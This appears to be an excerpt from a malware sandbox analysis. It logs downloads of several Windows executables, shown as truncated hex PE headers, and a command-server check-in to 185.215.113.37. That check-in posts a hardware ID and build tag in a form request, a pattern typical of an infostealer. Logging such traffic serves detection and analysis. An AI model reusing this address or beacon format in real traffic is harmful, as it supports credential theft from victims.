0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 00:50:18 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 00:50:20 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 00:50:21 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 00:50:22 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 00:50:24 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 00:50:24 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECGIEBAEBFIIECBGCBGHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 47 49 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 44 43 37 31 39 41 34 31 30 42 42 38 38 33 38 38 34 31 37 39 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 49 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 47 49 45 42 41 45 42 46 49 49 45 43 42 47 43 42 47 2d 2d 0d 0a Data Ascii: ------IECGIEBAEBFIIECBGCBGContent-Disposition: form-data; name="hwid"FDC719A410BB883884179------IECGIEBAEBFIIECBGCBGContent-Disposition: form-data; name="build"doma------IECGIEBAEBFIIECBGCBG--
